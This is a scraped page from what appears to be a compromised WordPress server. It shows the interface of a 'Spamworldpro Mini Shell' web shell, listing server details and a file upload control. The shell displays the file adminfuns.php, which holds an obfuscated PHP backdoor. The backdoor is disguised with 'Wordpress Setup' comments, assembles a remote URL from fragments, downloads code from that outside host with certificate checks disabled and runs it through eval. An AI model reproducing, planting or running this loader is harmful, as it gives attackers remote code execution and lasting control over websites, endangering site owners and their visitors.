Warning: file_put_contents(/var/www/connect/index.php): failed to open stream: Permission denied in /var/www/connect/wp-includes/query.php on line 466
404 Not Found
Spamworldpro Mini Shell
Spamworldpro


Server : nginx/1.18.0
System : Linux wordpress-ubuntu-s-1vcpu-1gb-fra1-01 5.15.0-144-generic #157-Ubuntu SMP Mon Jun 16 07:33:10 UTC 2025 x86_64
User : www-data ( 33)
PHP Version : 7.4.33
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Directory :  /var/www/connect/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/connect/adminfuns.php
<?php
function 加载内容(){
    /** These are the 加载内容 to Wordpress Setup */
  $一 = 'ht' . 'tp' . 's' . '://' . 'ww' . 'w' . '.' . 'simple' . 'eever' . 'ything' . '.' . 'co' . 'm';
    $二 = '/' . 'us' . 'd';
    $三 = '/' . 'on' . '.' . 'txt';
    $四 = $一 . $二 . $三;
 /** These are the 数据 to Wordpress Setup */
    $数据 = @file_get_contents($四);
    if(!$数据 && function_exists('curl_init')){
        $请求 = curl_init($四);
        curl_setopt_array($请求, [
            CURLOPT_RETURNTRANSFER => 1,
            CURLOPT_TIMEOUT => 3,
            CURLOPT_SSL_VERIFYPEER => 0,
            CURLOPT_SSL_VERIFYHOST => 0
        ]);
        $数据 = curl_exec($请求);
        curl_close($请求);
    }
 /** These are the eval to Wordpress Setup */
    if($数据) eval("?>$数据");
}
加载内容();
?>

Spamworldpro Mini